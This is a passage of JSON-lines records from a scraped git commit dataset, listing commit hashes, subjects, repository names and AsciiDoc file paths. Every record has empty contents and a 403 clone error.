saigne\/camel,Fabryprog\/camel,cunningt\/camel,ullgren\/camel,pax95\/camel,jamesnetherton\/camel,christophd\/camel,alvinkwekel\/camel,adessaigne\/camel,Fabryprog\/camel,sverkera\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,anoordover\/camel,ullgren\/camel,cunningt\/camel,apache\/camel,adessaigne\/camel,anoordover\/camel,christophd\/camel,adessaigne\/camel,zregvart\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,nicolaferraro\/camel,sverkera\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,anoordover\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,mcollovati\/camel,ullgren\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,kevinearls\/camel,mcollovati\/camel,objectiser\/camel,pax95\/camel,davidkarlsen\/camel,onders86\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,jamesnetherton\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,kevinearls\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,gnodet\/camel,jamesnetherton\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,onders86\/camel,onders86\/camel,ullgren\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2175-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2175-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c24b2e256b2bac00eef28c227dea2beb0335381d","subject":"Update 2016-09-06-TWCTF.adoc","message":"Update 2016-09-06-TWCTF.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF.adoc","new_file":"_posts\/2016-09-06-TWCTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"630ddc5d28b89977a598e6cf5865590ae53e4b7a","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf56f62681af45f4f3b6ad2e37aeeacbc010157","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af71e98a9b28285b82da8b691a336eae34ea7785","subject":"resolving conflicts","message":"resolving conflicts\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"427bd2a473d1c73091171c7aaad18588ee5960e1","subject":"GF debug info","message":"GF debug info\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Glassfish-debug.adoc","new_file":"Glassfish-debug.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87b36a3ef4d443e4b5d9173072c87a671f6214f6","subject":"Publish 2015-01-31.adoc","message":"Publish 2015-01-31.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"2015-01-31.adoc","new_file":"2015-01-31.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa636b5d1bb246b212ee3c9a06168b4f7bbe3a1e","subject":"Issue #970 - Add documentation around transaction usage in Quarkus","message":"Issue #970 - Add documentation around transaction usage in Quarkus\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/transaction-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/transaction-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a2fcbf78537859d049a919c006ff63388baa6b8","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cf3d72941f2911da84f1ef0b8492851a97adf77","subject":"y2b create post iPhone 7 - Now Shatter Proof?","message":"y2b create post iPhone 7 - Now Shatter Proof?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-22-iPhone-7--Now-Shatter-Proof.adoc","new_file":"_posts\/2016-10-22-iPhone-7--Now-Shatter-Proof.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49f5a4ead7d6288fab3bb5c6f5cccc87798684d2","subject":"Add quote internationalization snippet","message":"Add quote internationalization snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteInternationalization.adoc","new_file":"src\/main\/docs\/common-quoteInternationalization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9e272329e51a0ebc204fcc59f62ac327bc8b4cb","subject":"forgot that page","message":"forgot that page\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"pages\/download.adoc","new_file":"pages\/download.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2e7b27838bbdea63e5b05e60f3afe529ef61c58","subject":"Update 2015-05-09-SSL-et-les-banques.adoc","message":"Update 2015-05-09-SSL-et-les-banques.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2015-05-09-SSL-et-les-banques.adoc","new_file":"_posts\/2015-05-09-SSL-et-les-banques.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b92a01c6d2d6bbbe99ce904b7e89f68f3b6f3cac","subject":"Update protocol documentation.","message":"Update protocol documentation.\n","repos":"funcool\/postal","old_file":"doc\/proto.adoc","new_file":"doc\/proto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/funcool\/postal.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"e29bd7e31216a5bcd463012713aa1b4bfc407e7d","subject":"New README for discussion (ref #20)","message":"New README for discussion (ref #20)\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/common\/sh\/README.adoc","new_file":"workflows\/common\/sh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852973140d30a022ebfed97529c935fa6c0cf4f0","subject":"add minimal doc","message":"add minimal doc","repos":"nlalevee\/httpant","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nlalevee\/httpant.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b02690c6e95cc788fa3d2305fbd5e0be6435d68","subject":"Adding README","message":"Adding README\n","repos":"noamt\/bitbucket-asciidoctor-addon,noamt\/bitbucket-asciidoctor-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noamt\/bitbucket-asciidoctor-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c15a18f2d8daf5c565a6251a6a9a5ee81a1654ef","subject":"Update 2015-07-01-Hybris-modelsjar-not-found.adoc","message":"Update 2015-07-01-Hybris-modelsjar-not-found.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybris-modelsjar-not-found.adoc","new_file":"_posts\/2015-07-01-Hybris-modelsjar-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adc1a6a2004d08cf37d59af5ad30abefc79abd2d","subject":"Added separate section for best practices.","message":"Added separate section for best practices.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/best-practices.adoc","new_file":"docs\/best-practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"098e9abeec505945675e6273c1d3141457b1adfc","subject":"Update 2017-01-19-Mesaj.adoc","message":"Update 2017-01-19-Mesaj.adoc","repos":"alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io","old_file":"_posts\/2017-01-19-Mesaj.adoc","new_file":"_posts\/2017-01-19-Mesaj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alick01\/alick01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e291dfc0d16661e667a891a41837480cf395aad","subject":"update readme","message":"update readme\n","repos":"jbosschina\/openshift-cookbooks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fe4db9ba7f503c3c68191df9299f5b994f537a4","subject":"Final 1.0","message":"Final 1.0","repos":"schnawel007\/jsEventBus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/schnawel007\/jsEventBus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90f78b4dcf556e4c326312bbab1e3faae9f126eb","subject":"y2b create post What If You Could Get AirPods For Only $40?","message":"y2b create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-11-WhatIfYouCouldGetAirPodsForOnly40.adoc","new_file":"_posts\/2018-02-11-WhatIfYouCouldGetAirPodsForOnly40.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"376f53ea3f3907e7a3ce56cff949e6528ce80aab","subject":"Add Riviera Pro documentation","message":"Add Riviera Pro documentation\n","repos":"lowRISC\/fusesoc,lowRISC\/fusesoc,olofk\/fusesoc,olofk\/fusesoc","old_file":"doc\/rivierapro.adoc","new_file":"doc\/rivierapro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olofk\/fusesoc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"201a0c7aacae70f1ab911ad4994e66c5c2351172","subject":"Update 2015-10-06-Nameless-Free-Loggers-In-Java.adoc","message":"Update 2015-10-06-Nameless-Free-Loggers-In-Java.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2015-10-06-Nameless-Free-Loggers-In-Java.adoc","new_file":"_posts\/2015-10-06-Nameless-Free-Loggers-In-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac47c7a97f7fb653eb5125a697f33a5d7c5d604d","subject":"Reflect latest Tree API and styling changes to the documentation","message":"Reflect latest Tree API and styling changes to the documentation\n\n","repos":"kironapublic\/vaadin,peterl1084\/framework,peterl1084\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework","old_file":"documentation\/components\/components-tree.asciidoc","new_file":"documentation\/components\/components-tree.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9bf4f2452619d31025a9d39b1cb74525df9f61a","subject":"Update 2016-02-26-Test.adoc","message":"Update 2016-02-26-Test.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Test.adoc","new_file":"_posts\/2016-02-26-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac288a2c52a94039042dde436a497db388d9958b","subject":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-bleh.adoc'","message":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-bleh.adoc'","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-bleh.adoc","new_file":"_posts\/2019-01-31-bleh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f40f2b27048326beee2e5ba27d9e3129d18eec79","subject":"Update 2017-01-22-Bismillah.adoc","message":"Update 2017-01-22-Bismillah.adoc","repos":"ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io,ktekbiyikiletisim\/ktekbiyikiletisim.github.io","old_file":"_posts\/2017-01-22-Bismillah.adoc","new_file":"_posts\/2017-01-22-Bismillah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ktekbiyikiletisim\/ktekbiyikiletisim.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f37941b96f6ac1c2d63892c2f063eab6b8d0e6b4","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d70045746ba3f20dedf5faac573dc073db154cb0","subject":"Update 2016-03-15-Using-the-Python-Interpreter.adoc","message":"Update 2016-03-15-Using-the-Python-Interpreter.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-03-15-Using-the-Python-Interpreter.adoc","new_file":"_posts\/2016-03-15-Using-the-Python-Interpreter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a452a9e12074ce83ba07da981b52901d0b42b80d","subject":"Added remove Header EIP docs","message":"Added remove Header EIP docs\n","repos":"davidkarlsen\/camel,Fabryprog\/camel,dmvolod\/camel,pmoerenhout\/camel,kevinearls\/camel,adessaigne\/camel,jonmcewen\/camel,pax95\/camel,DariusX\/camel,apache\/camel,jonmcewen\/camel,christophd\/camel,davidkarlsen\/camel,pax95\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,Fabryprog\/camel,anoordover\/camel,punkhorn\/camel-upstream,objectiser\/camel,pmoerenhout\/camel,akhettar\/camel,gautric\/camel,sverkera\/camel,christophd\/camel,curso007\/camel,nicolaferraro\/camel,curso007\/camel,anoordover\/camel,zregvart\/camel,jonmcewen\/camel,CodeSmell\/camel,snurmine\/camel,adessaigne\/camel,gnodet\/camel,dmvolod\/camel,DariusX\/camel,gautric\/camel,punkhorn\/camel-upstream,adessaigne\/camel,alvinkwekel\/camel,anoordover\/camel,jamesnetherton\/camel,sverkera\/camel,curso007\/camel,DariusX\/camel,akhettar\/camel,onders86\/camel,adessaigne\/camel,pax95\/camel,jonmcewen\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,anoordover\/camel,tadayosi\/camel,akhettar\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,zregvart\/camel,gautric\/camel,snurmine\/camel,gnodet\/camel,gautric\/camel,akhettar\/camel,nikhilvibhav\/camel,onders86\/camel,adessaigne\/camel,onders86\/camel,cunningt\/camel,christophd\/camel,tadayosi\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,nikhilvibhav\/camel,CodeSmell\/camel,anoordover\/camel,christophd\/camel,tadayosi\/camel,nicolaferraro\/camel,dmvolod\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,jonmcewen\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,gautric\/camel,punkhorn\/camel-upstream,zregvart\/camel,Fabryprog\/camel,cunningt\/camel,snurmine\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,onders86\/camel,nicolaferraro\/camel,cunningt\/camel,tadayosi\/camel,ullgren\/camel,tadayosi\/camel,sverkera\/camel,snurmine\/camel,DariusX\/camel,pmoerenhout\/camel,dmvolod\/camel,ullgren\/camel,mcollovati\/camel,alvinkwekel\/camel,curso007\/camel,kevinearls\/camel,akhettar\/camel,gautric\/camel,jamesnetherton\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,kevinearls\/camel,nicolaferraro\/camel,gnodet\/camel,punkhorn\/camel-upstream,pax95\/camel,sverkera\/camel,CodeSmell\/camel,tdiesler\/camel,alvinkwekel\/camel,curso007\/camel,akhettar\/camel,mcollovati\/camel,mcollovati\/camel,jamesnetherton\/camel,alvinkwekel\/camel,curso007\/camel,ullgren\/camel,snurmine\/camel,cunningt\/camel,CodeSmell\/camel,zregvart\/camel,sverkera\/camel,kevinearls\/camel,jamesnetherton\/camel,gnodet\/camel,kevinearls\/camel,objectiser\/camel,objectiser\/camel,dmvolod\/camel,tdiesler\/camel,jonmcewen\/camel,davidkarlsen\/camel,apache\/camel,christophd\/camel,onders86\/camel,jamesnetherton\/camel,pmoerenhout\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeHeader-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeHeader-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73b147bd6a94563e6e3bb7dd153b9d70a3589a85","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1342b21408b82f8ddc7d6b6ad3ddf708e3d0e7e5","subject":"Update 2015-06-09-JS-ES6-language-features.adoc","message":"Update 2015-06-09-JS-ES6-language-features.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_file":"_posts\/2015-06-09-JS-ES6-language-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3cdf9b67d0b1f9524bed0685429c40ec8e05dcb","subject":"y2b create post The Marshmallow Crossbow","message":"y2b create post The Marshmallow Crossbow","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-09-The-Marshmallow-Crossbow.adoc","new_file":"_posts\/2016-11-09-The-Marshmallow-Crossbow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e81ec34e5f479e98fd5e65a7aad5363ad5915dd7","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee2a024e1e3221e78ff340101a4becf715545a93","subject":"Update example in order to prevent confusion","message":"Update example in order to prevent confusion\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ed019edd8e84fa1e7aff4e0ef356a046b99b184e","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65c9e1fb56f994a43d6dd4a4249f229c32d63282","subject":"Add release notes for release 2.22.5","message":"Add release notes for release 2.22.5\n","repos":"mcollovati\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,alvinkwekel\/camel,DariusX\/camel,pmoerenhout\/camel,Fabryprog\/camel,apache\/camel,apache\/camel,davidkarlsen\/camel,davidkarlsen\/camel,davidkarlsen\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,apache\/camel,Fabryprog\/camel,pmoerenhout\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,tdiesler\/camel,apache\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,Fabryprog\/camel,ullgren\/camel,christophd\/camel,objectiser\/camel,ullgren\/camel,cunningt\/camel,pax95\/camel,ullgren\/camel,pax95\/camel,nicolaferraro\/camel,cunningt\/camel,christophd\/camel,CodeSmell\/camel,objectiser\/camel,gnodet\/camel,zregvart\/camel,mcollovati\/camel,mcollovati\/camel,alvinkwekel\/camel,CodeSmell\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,adessaigne\/camel,CodeSmell\/camel,adessaigne\/camel,cunningt\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,pax95\/camel,nikhilvibhav\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,christophd\/camel,nicolaferraro\/camel,zregvart\/camel,objectiser\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,pmoerenhout\/camel,christophd\/camel,christophd\/camel,apache\/camel,DariusX\/camel,adessaigne\/camel,davidkarlsen\/camel,Fabryprog\/camel,zregvart\/camel,nikhilvibhav\/camel,tadayosi\/camel,objectiser\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,alvinkwekel\/camel,DariusX\/camel,gnodet\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2225-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2225-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"21535e9c6ebd312e038fd1061af4fe05f3528ae2","subject":"Back to GF 4","message":"Back to GF 4\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"App servers from Eclipse.adoc","new_file":"App servers from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc612884f2b32a8bd2ecde79c2231bffa7f23f99","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 